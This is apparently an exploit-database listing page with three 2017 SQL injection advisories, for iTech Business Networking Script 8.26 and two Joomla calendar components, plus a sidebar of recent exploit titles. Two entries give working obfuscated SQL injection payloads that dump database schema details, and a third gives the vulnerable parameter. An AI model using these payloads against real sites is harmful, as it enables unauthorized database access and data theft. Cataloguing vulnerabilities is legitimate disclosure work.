header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Show More

iTech Business Networking Script 8.26 – SQL Injection

The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'grid' in group.php and 'id' in join_group.php. Proof of Concept: http://localhost/[PATH]/group.php?grid=[SQL] -1'+/*!22222union*/+/*!22222select*/+0x31,0x32,0x33,0x34,0x35,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134--+- and http://localhost/[PATH]/join_group.php?id=[SQL].

N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name
Business Networking Script
Platforms Tested
WiN7_x64/KaLiLinuX_x64
Affected Version
From:
8.26
To:
8.26
2017
Show More

Joomla! Component Calendar Planner 1.0.1 – SQL Injection

The vulnerability allows an attacker to inject sql commands into the vulnerable application. Proof of Concept: http://localhost/[PATH]/index.php/component/calendarplanner/events?searchword=&option=com_calendarplanner&view=events&category_id=[SQL]

N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name
Calendar Planner
Platforms Tested
WiN7_x64/KaLiLinuX_x64
Affected Version
From:
1.0.1
To:
1.0.1
2017
Show More

Joomla! Component Zap Calendar Lite 4.3.4 – SQL Injection

The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/index.php?option=com_zcalendar&view=plugin&name=rsvp&task=rsvpform&user=&eid=[SQL] 1++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)&format=raw

N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name
Zap Calendar Lite
Platforms Tested
WiN7_x64/KaLiLinuX_x64
Affected Version
From:
4.3.4
To:
4.3.4
2017

Recent Exploits:

RDPGuard 9.9.9 – Privilege Escalation

author
Ahmet Ümit BAYRAM
vendor
RDPGuard
severity
6.1
HIGH

YesWiki Unauthenticated Path Traversal

author
Al Baradi Joy
vendor
YesWiki
severity
7.1
HIGH

ABB Cylon Aspect 3.08.02 Stored Cross-Site Scripting Vulnerability

author
Gjoko 'LiquidWorm' Krstic
vendor
ABB Ltd.
severity
6.1
HIGH

Apache ActiveMQ 6.1.6 – Denial of Service (DOS)

author
Abdualhadi khalifa
vendor
Apache
severity
6.1
HIGH

GeoVision GV-ASManager 6.1.1.0 – CSRF

author
Giorgi Dograshvili [DRAGOWN]
vendor
GeoVision
severity
6.1
HIGH

ABB Cylon FLXeon 9.3.4 WebSocket Command Spawning Vulnerability

author
Zero Science Lab
vendor
ABB Ltd.
severity
6.1
HIGH

GestioIP 3.5.7 – Stored Cross-Site Scripting Vulnerability

author
m4xth0r (Maximiliano Belino)
vendor
GestioIP
severity
6.1
HIGH

Cacti 1.2.26 – Remote Code Execution (RCE) (Authenticated)

author
D3Ext
vendor
Cacti
severity
6.1
HIGH

Exclusive Addons for Elementor ≤ 2.6.9 – Authenticated Stored Cross-Site Scripting (XSS)

author
Al Baradi Joy
vendor
exclusiveaddons
severity
5.1
MEDIUM

Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)

author
Alex Messham
vendor
Kentico
severity
6.1
HIGH

Navigation

Suggest Exploit

Services By CQR